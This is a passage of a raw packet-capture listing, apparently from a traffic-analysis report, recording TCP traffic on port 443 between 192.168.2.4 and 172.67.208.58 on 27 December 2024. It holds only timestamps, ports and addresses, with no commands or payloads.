                                                                                                                                                                                            Dec 27, 2024 20:23:44.741682053 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.741718054 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.741744995 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.741784096 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.741811037 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.741828918 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.751545906 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.751569033 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.751616001 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.751631021 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.751677036 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.751677036 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.760516882 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.760536909 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.760584116 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.760597944 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.760623932 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.760642052 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.769155025 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.769177914 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.769223928 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.769237041 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.769265890 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.769284010 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.777544975 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.777566910 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.777609110 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.777621984 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.777650118 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.777673006 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.785826921 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.785849094 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.785902977 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.785917044 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.785942078 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.785964966 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.794576883 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.794599056 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.794650078 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.794663906 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.794696093 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.794717073 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.803385973 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.803421021 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.803472042 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.803487062 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.803517103 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.803553104 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.933140993 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.933166981 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.933221102 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.933245897 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.933271885 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.933290958 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.940419912 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.940443039 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.940488100 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.940502882 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.940531015 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.940565109 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.947762966 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.947784901 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.947865963 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.947884083 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.947931051 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.955678940 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.955703974 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.955775023 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.955795050 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.955845118 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.963073015 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.963093996 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.963172913 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.963190079 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.963238001 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.970962048 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.970983982 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.971026897 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.971041918 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.971067905 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.971093893 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.977914095 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.977936029 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.977977037 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.977989912 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.978013992 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.978034019 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.985652924 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.985682964 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.985733986 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.985749006 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.985773087 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.986330032 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.124687910 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.124713898 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.124768019 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.124803066 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.124833107 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.124850035 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.132167101 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.132188082 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.132234097 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.132252932 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.132276058 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.132299900 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.140055895 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.140075922 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.140140057 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.140155077 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.140208006 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.147957087 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.147978067 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.148047924 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.148066998 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.148092031 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.148109913 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.148957014 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.155443907 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.155464888 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.155508041 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.155522108 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.155546904 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.155571938 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.162470102 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.162489891 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.162533045 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.162547112 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.162574053 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.162591934 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.170491934 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.170512915 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.170557022 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.170588970 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.170614004 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.170723915 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.177872896 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.177892923 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.177932024 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.177946091 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.177973986 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.177993059 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.189697981 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.318941116 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.318984032 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.319039106 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.319092989 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.319120884 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.319140911 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.325809002 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.325831890 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.325900078 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.325925112 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.325949907 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.325983047 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.333626986 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.333648920 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.333703041 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.333743095 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.333771944 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.333791971 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.341583014 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.341608047 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.341706991 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.341723919 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.341795921 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.343295097 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.349034071 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.349059105 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.349104881 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.349122047 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.349134922 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.349395990 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.356744051 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.356761932 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.356812000 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.356832981 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.356852055 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.356893063 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.363513947 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.363528967 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.363594055 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.363617897 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.363756895 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.371529102 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.371543884 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.371604919 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.371634960 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.372315884 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.510780096 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.510798931 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.510850906 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.510874033 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.510890007 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.510912895 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.518508911 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.518526077 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.518558979 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.518579960 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.518594980 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.518615007 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.525903940 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.526398897 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.526415110 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.526451111 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.526463985 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.526488066 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.526499987 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.533365011 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.533380985 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.533449888 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.533469915 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.533538103 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.540581942 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.540599108 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.540643930 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.540663958 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.540682077 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.540704966 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.548445940 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.548463106 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.548536062 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.548556089 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.548612118 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.556556940 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.556576014 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.556662083 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.556699991 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.557046890 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.564187050 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.564203024 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.564260006 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.564279079 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.564321041 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.699106932 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.702779055 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.702800035 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.702857018 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.702900887 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.702935934 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.702958107 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.710705042 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.710721016 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.710783005 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.710799932 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.710859060 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.717525959 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.717542887 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.717582941 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.717598915 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.717626095 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.717696905 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.725379944 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.725397110 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.725454092 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.725456953 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.725511074 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.725543022 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.732780933 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.732800961 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.732840061 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.732868910 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.732882977 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.740748882 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.740762949 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.740844965 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.740901947 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.748456955 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.748476028 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.748516083 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.748533964 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.748567104 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.756311893 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.756334066 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.756380081 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.756395102 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.756427050 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.803332090 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.894980907 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.895000935 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.895082951 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.895162106 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.895298004 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.902646065 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.902662992 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.902718067 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.902739048 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.902769089 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.902832031 CET49747443192.168.2.4172.67.208.58
